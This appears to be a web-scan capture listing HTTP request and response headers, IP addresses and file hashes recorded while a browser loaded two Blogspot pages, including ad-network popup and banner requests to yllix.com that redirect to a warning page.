Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /js/platform.js HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://edoses.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.174
HTTP/2 200 OK
content-type: text/javascript
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gapi-team
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="gapi-team"
report-to: {"group":"gapi-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gapi-team"}]}
timing-allow-origin: *
content-length: 20361
date: Thu, 29 Sep 2022 03:49:07 GMT
expires: Thu, 29 Sep 2022 03:49:07 GMT
cache-control: private, max-age=1800, stale-while-revalidate=1800
etag: "40c22a9ccbd70870"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1277)
Size:   20361
Md5:    b5a31516be83fe4f962609045d824f88
Sha1:   939a49a9858bf23561279f9ca2d1941d3256c66f
Sha256: edb661aa461800e97e3847608a8b2d81cfe345f69a6f84abaa001d8a60500328
                                        
                                            GET /-tuk_1wh50CA/Tm9wp2tpvLI/AAAAAAAAAO0/ysNCYM5p7i8/w72-h72-p-k-no-nu/69-windows_7_wallpapers_1920x1200-19.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="69-windows_7_wallpapers_1920x1200-19.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 4515
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Wed, 28 Sep 2022 02:54:57 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "ved"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   4515
Md5:    9cdc6a314cb2744ddf714c1944c463b4
Sha1:   6f01c058e54222a9631a5d52ad60101419d2a474
Sha256: e0da738a09428db59d062d7dc11437dfd64ffe2930df980a577b0c6428edfb57
                                        
                                            GET /popup.php?section=General&pub=442632&ga=g&show=5 HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         185.66.200.224
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 29 Sep 2022 03:49:07 GMT
Content-Length: 162
Connection: keep-alive
Location: https://yllix.com/popup.php?section=General&pub=442632&ga=g&show=5


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            GET /banner_show.php?section=General&pub=442632&format=468x60&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/
Upgrade-Insecure-Requests: 1

                                         
                                         185.66.200.224
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 29 Sep 2022 03:49:07 GMT
Content-Length: 162
Connection: keep-alive
Location: https://yllix.com/banner_show.php?section=General&pub=442632&format=468x60&ga=g


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-MfAOwGE815s/UjXQbFF29_I/AAAAAAAAABU/G9QJPk-TIQU/s1600/sidebar21.png HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 404 Not Found
Content-Type: image/png
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:07 GMT
Server: fife
Content-Length: 832
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 200 x 200, 8-bit colormap, non-interlaced\012- data
Size:   832
Md5:    596246739a83bb45e30e13437e0810d9
Sha1:   203d99f5cb1f2c816d6f9974cc5a73cf412892a6
Sha256: 94aa7bf7f0d9660bb348ed4ed7faaa42c63f1a40f591dab32ce5046765df3615
                                        
                                            GET /-ZD72uG5BMTo/Uhxa-_pqIPI/AAAAAAAAARo/vOx2bwRyQkw/s72-c/synopsis.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="synopsis.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 4150
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Tue, 27 Sep 2022 14:15:32 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v11b"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   4150
Md5:    3990f8435bbc9acd22924a4fc39d342e
Sha1:   43a8e0fec92aa5c432ec0c03495ec2196e8d089a
Sha256: 81e62fa15123d8d89c2fed7d0a97c086c9d52d9178accf9b5cb4a1e555868104
                                        
                                            GET /-zNJ0FPjnKA0/Uhxqa93YEXI/AAAAAAAAAR8/aP_Z-4VsYPE/s72-c/hs.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="hs.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 4519
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Tue, 27 Sep 2022 14:15:32 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v11f"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Google, copyright=KODAK DC280 ZOOM DIGITAL CAMERA ], baseline, precision 8, 72x72, components 3\012- data
Size:   4519
Md5:    480371902bccced87ba174cf7ad4667d
Sha1:   bd781004c5d381675e4410651ce360fd31e619f5
Sha256: b2d6efef6f9240d2245a57909e72b48090948515f5911c2892fb9e99bac61e9d
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Tue, 27 Sep 2022 21:35:58 GMT
Expires: Tue, 04 Oct 2022 21:35:57 GMT
Etag: "9af52451772c9a2a73bd9f1bd8c5bc01a50c79ee"
Cache-Control: max-age=495409,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb1
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf40ac10b518-OSL

                                        
                                            GET /banner_show.php?section=General&pub=442632&format=468x60&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         185.66.200.224
HTTP/2 301 Moved Permanently
content-type: text/html
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
content-length: 162
location: https://yllix.com/warn.php?section=General&pub=442632&format=468x60&ga=g
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: awesomew4llpapers.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/2011/02/actress-wallpaper.html

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Expires: Thu, 29 Sep 2022 03:49:07 GMT
Date: Thu, 29 Sep 2022 03:49:07 GMT
Cache-Control: private, max-age=86400
Last-Modified: Mon, 06 Dec 2021 07:31:43 GMT
ETag: W/"76f19a0de4a7196f1f7327bbbea5a2b1cd36c5dee94cb710afb1646b98ba8735"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 412
Server: GSE


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 16x16, 8 bits/pixel\012- data
Size:   412
Md5:    501c61a70f5c41181aa050d9110909ca
Sha1:   5b985d5671a7caf686fdfb1df13488c4407f6c9f
Sha256: c4aaf001607ee331f6871b4dbbf45942b1e197726714fd106e46d70cc10ee97e
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 2+5M3SzhI8vCpMorWClE5w==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.39.126.109
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 9EWlz7jLfxAYHiq2rMJ77JYJars=

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Tue, 27 Sep 2022 21:35:58 GMT
Expires: Tue, 04 Oct 2022 21:35:57 GMT
Etag: "9af52451772c9a2a73bd9f1bd8c5bc01a50c79ee"
Cache-Control: max-age=495409,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf4099f0b4ee-OSL

                                        
                                            GET /popup.php?section=General&pub=442632&ga=g&show=5 HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         185.66.200.224
HTTP/2 301 Moved Permanently
content-type: text/html
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
content-length: 162
location: https://yllix.com/warn.php?section=General&pub=442632&ga=g&show=5
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            GET /-7ClhWWxtkdI/UiL2BJBY5aI/AAAAAAAADms/--M-npbmDq4/s72-c/Screen+Shot+2013-09-01+at+6.06.22+PM.png HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="Screen Shot 2013-09-01 at 6.06.22 PM.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 8780
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Tue, 27 Sep 2022 14:15:32 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "ve6e"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   8780
Md5:    233d3dbef1d645ec9bbf32bd02a768fa
Sha1:   b10bc5629dcb6928b6156ec161331e4cc0868d09
Sha256: 90a35d97bf59ceaf1e391a0a923da243bff60d9d615a8fe62eabeabe8c6ab109
                                        
                                            GET /-ewoesXDJ34g/UhinqKujEAI/AAAAAAAADiU/4Lyq91pHPS0/s72-c/Screen+Shot+2013-08-24+at+10.29.48+PM.png HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="Screen Shot 2013-08-24 at 10.29.48 PM.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 8291
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Tue, 27 Sep 2022 14:15:32 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "ve26"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   8291
Md5:    19e24d43c6527034ebeb2f4599ee1f88
Sha1:   1760b869891848b7d6785786aaabb73bfdc7f471
Sha256: d9613572858543c7bcb703367e2b8bf0caa2c11c1407dfd25123679f1b148095
                                        
                                            GET /warn.php?section=General&pub=442632&ga=g&show=5 HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         185.66.200.224
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   31377
Md5:    821b84646702a3fbeaf64a1d22105d9d
Sha1:   fb6d284b34fb5b6507de0c55607a6412e0cdcb7e
Sha256: 17677072a0512166fb0c3e0bef0b9932d9fc7803b6b45588b754fdb72f6cbdb3
                                        
                                            GET /banner_show.php?section=General&pub=442632&format=300x250&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/
Upgrade-Insecure-Requests: 1

                                         
                                         185.66.200.224
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 29 Sep 2022 03:49:07 GMT
Content-Length: 162
Connection: keep-alive
Location: https://yllix.com/banner_show.php?section=General&pub=442632&format=300x250&ga=g


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            GET /-jfga54zfVyE/UiMuQiiQPdI/AAAAAAAADoM/2XfeM5BTx2U/s72-c/Screen+Shot+2013-09-01+at+10.04.26+PM.png HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="Screen Shot 2013-09-01 at 10.04.26 PM.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 10612
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Sat, 24 Sep 2022 03:43:16 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "ve85"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   10612
Md5:    6d4594a56caa86996a8371d909bf0361
Sha1:   3fc4524db5cc562715b1af075f8818669caa12f1
Sha256: 274a60372856ae3a3a4d81321cf16986187e5ae12b642465ca87b723daf9d80c
                                        
                                            GET /-zafkIpF0NeM/UhcNYwBeRNI/AAAAAAAADfc/9Rf6QZg1IoM/s72-c/photo+(60).PNG HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="photo (60).PNG"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 3808
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Tue, 27 Sep 2022 14:15:32 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "vdf8"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   3808
Md5:    b0fac2688d7367a15d637a3b91385768
Sha1:   c58b0f22b78792da6dc71b290dd7935194d7999f
Sha256: 0ce33572a06ba62f0d2e0f41885a3cb4e332b55471a375a5da89b25c19b599d3
                                        
                                            GET /banner_show.php?section=General&pub=442632&format=300x250&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         185.66.200.224
HTTP/2 301 Moved Permanently
content-type: text/html
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
content-length: 162
location: https://yllix.com/warn.php?section=General&pub=442632&format=300x250&ga=g
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
                                        
                                            GET /js/1826.004-3.025/ice.js HTTP/1.1 
Host: resources.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         172.66.41.9
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 26 Sep 2022 10:00:04 GMT
ETag: W/"2d126-5e9919773e9da"
Cache-Control: max-age=2592000
Expires: Sat, 29 Oct 2022 03:24:15 GMT
Via: 1.1 google
CF-Cache-Status: HIT
Age: 1492
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7521bf43abc5b4e8-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (32082)
Size:   56884
Md5:    680f173d963417c498b94c62c60574dd
Sha1:   62ec06827bb1b9d713087ad4791cd141eee79509
Sha256: 491a0310789b9f8dd69da150a005bc0151893ddc94cbd86d5ec9ee9f39910f03
                                        
                                            GET /-O__ZSjp_Jrw/UjXXLJbgRNI/AAAAAAAAABk/aURwEF_M-MM/s1600/tops1.png HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 404 Not Found
Content-Type: image/png
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:07 GMT
Server: fife
Content-Length: 832
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 200 x 200, 8-bit colormap, non-interlaced\012- data
Size:   832
Md5:    596246739a83bb45e30e13437e0810d9
Sha1:   203d99f5cb1f2c816d6f9974cc5a73cf412892a6
Sha256: 94aa7bf7f0d9660bb348ed4ed7faaa42c63f1a40f591dab32ce5046765df3615
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2020
Cache-Control: max-age=128751
Date: Thu, 29 Sep 2022 03:49:07 GMT
Etag: "633461be-117"
Expires: Fri, 30 Sep 2022 15:34:58 GMT
Last-Modified: Wed, 28 Sep 2022 15:01:18 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 279

                                        
